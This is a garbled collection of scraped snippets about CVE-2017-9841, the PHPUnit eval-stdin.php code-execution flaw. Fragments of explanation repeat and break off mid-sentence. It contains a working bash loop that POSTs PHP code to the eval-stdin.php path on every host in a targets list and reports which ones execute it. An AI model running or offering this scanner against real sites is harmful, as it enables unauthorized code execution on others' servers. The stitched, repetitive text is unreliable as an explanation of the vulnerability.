This command would output:
for url in $(cat targets.txt); do curl -s -X POST -d "<?php echo md5('test'); ?>" "$url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" | grep -q "098f6bcd4621d373cade4e832627b4f6" && echo "$url is vulnerable" done index of vendor phpunit phpunit src util php eval-stdin.php
The eval-stdin.php script is used to evaluate PHP code from standard input. This script reads PHP code from standard input, executes it, and returns the output. The script is often used in conjunction with other tools, such as the php command-line interpreter, to execute PHP code in a variety of contexts. This command would output: for url in $(cat targets
: The eval-stdin.php script reads input from php://input (the raw body of an HTTP request) and passes it directly into the eval() function. : The eval-stdin
testing framework that was unintentionally left accessible to the public in many installations. Why This is Significant CVE-2017-9841 Detail - NVD 21 Oct 2025 —